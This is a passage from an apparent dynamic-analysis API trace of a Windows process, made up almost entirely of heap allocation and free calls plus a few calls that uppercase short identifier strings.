dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0155.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0155.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0155.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0155.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0155.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0155.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0155.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0155.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0155.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0155.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0155.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0155.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0155.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0155.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0155.127] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa930 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0155.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0155.127] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0155.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0155.128] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa50 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73db8 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0155.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0155.128] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0155.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73db8 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0155.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0155.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0155.130] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa948 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a742c8 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0155.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0155.130] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0155.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a742c8 | out: hHeap=0x2af0000) returned 1 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0155.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0155.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0155.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0155.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0155.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0155.132] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0155.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0155.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0155.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0155.133] HeapFree (in: 